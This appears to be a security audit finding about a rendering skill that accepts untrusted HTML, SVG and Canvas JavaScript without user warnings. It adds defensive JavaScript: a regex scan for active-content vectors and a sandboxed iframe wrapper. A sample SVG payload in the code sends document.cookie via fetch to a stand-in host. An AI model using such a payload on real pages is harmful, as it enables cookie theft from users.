Missing User Warnings
Medium
- Confidence: 91%
- Finding
- The skill explicitly invites users to supply arbitrary HTML, SVG, and Canvas JavaScript for rendering. That is a direct path to active-content execution as soon as the generated HTML is opened in a browser or browser-like environment (a preview pane, a headless renderer, a document converter built on a browser engine): `<script>` elements, inline event handlers, `javascript:` URLs, and script embedded in SVG all run with the privileges of the context that opens the file, and even with scripts disabled, references to remote resources can leak data. Because the documentation frames this as normal usage and gives no warning, sandboxing requirement, or trust-boundary guidance (for example, that the markup must come from a trusted source, or must be rendered only in an isolated origin with scripts disabled), users are likely to pass untrusted input through the skill and trigger script execution, data exfiltration, or local file abuse through embedded active content.
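The following is an added example of the kind of guard the finding says is missing; it is not code from the skill or from its documentation. It shows, in JavaScript, a heuristic scan that flags the common active-content vectors in user-supplied HTML or SVG, and a wrapper that renders the markup inside an `<iframe sandbox>` via `srcdoc` with a restrictive Content-Security-Policy, so that scripts cannot run and resource fetches that could exfiltrate data are blocked. The pattern list, the sample markup, and the function names are assumptions made for this example, not anything the skill defines.

```javascript
// Added example: heuristic active-content scan plus a sandboxed rendering wrapper
// for untrusted HTML/SVG. Not part of the skill being assessed.

// Assumed pattern list: the usual script vectors in HTML and SVG. It is a
// heuristic for deciding whether to warn, not a sanitizer, so an occasional
// false positive (an attribute that merely starts with "on") is acceptable.
const ACTIVE_CONTENT_PATTERNS = [
  { name: 'script element',       re: /<\s*script\b/i },
  { name: 'inline event handler', re: /\son[a-z]+\s*=/i },
  { name: 'javascript: URL',      re: /(href|src|xlink:href|action|formaction)\s*=\s*["']?\s*javascript:/i },
  { name: 'SVG foreignObject',    re: /<\s*foreignObject\b/i },
  { name: 'iframe/object/embed',  re: /<\s*(iframe|object|embed)\b/i },
  { name: 'data: URL carrying markup or script',
    re: /(href|src|xlink:href)\s*=\s*["']?\s*data:\s*(text\/html|image\/svg\+xml|application\/javascript)/i },
  { name: 'base element',         re: /<\s*base\b/i },
];

// Returns the names of every pattern found in the markup (empty array if none).
function findActiveContent(markup) {
  return ACTIVE_CONTENT_PATTERNS
    .filter((p) => p.re.test(markup))
    .map((p) => p.name);
}

// Escape a string for use inside a double-quoted HTML attribute value.
function escapeAttr(s) {
  return s
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Wrap untrusted markup in a sandboxed iframe. With allowScripts=false the
// sandbox attribute is empty, so scripts, forms, popups and top navigation are
// all disabled and the frame gets an opaque origin. The CSP inside the frame
// blocks every network fetch except data: images and inline styles, which also
// stops script-free exfiltration via <img src="https://attacker/...">.
// If scripts are needed, only "allow-scripts" is granted: never combine it with
// "allow-same-origin", because a same-origin framed script can remove its own
// sandbox.
function sandboxWrap(markup, { allowScripts = false } = {}) {
  const sandbox = allowScripts ? 'allow-scripts' : '';
  const csp = allowScripts
    ? "default-src 'none'; script-src 'unsafe-inline'; img-src data:; style-src 'unsafe-inline'"
    : "default-src 'none'; img-src data:; style-src 'unsafe-inline'";
  const inner =
    '<!doctype html><html><head><meta charset="utf-8">' +
    `<meta http-equiv="Content-Security-Policy" content="${csp}">` +
    `</head><body>${markup}</body></html>`;
  return (
    '<!doctype html><html><head><meta charset="utf-8"></head><body>' +
    `<iframe sandbox="${sandbox}" referrerpolicy="no-referrer" srcdoc="${escapeAttr(inner)}"></iframe>` +
    '</body></html>'
  );
}

// Constructed sample inputs for this example (not taken from any real input).
const SAMPLE_SVG =
  '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" ' +
  'onload="fetch(\'https://example.invalid/?c=\'+document.cookie)">' +
  '<script>alert(1)</script>' +
  '<a xlink:href="javascript:alert(2)"><text>x</text></a></svg>';

const BENIGN_SVG =
  '<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="4" fill="red"/></svg>';

// Stand-alone demonstration: warn, then render only through the sandbox.
const hits = findActiveContent(SAMPLE_SVG);
if (hits.length > 0) {
  console.log('WARNING: supplied markup contains active content:', hits.join(', '));
}
console.log(sandboxWrap(SAMPLE_SVG).slice(0, 120) + '...');
```

The scan is the "warn" half of the guidance the finding asks for; the wrapper is the "sandbox" half. Neither makes untrusted markup safe to open directly as a top-level page, which is the point: the skill's output should be rendered only through an isolated, script-disabled context like the one the wrapper produces.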
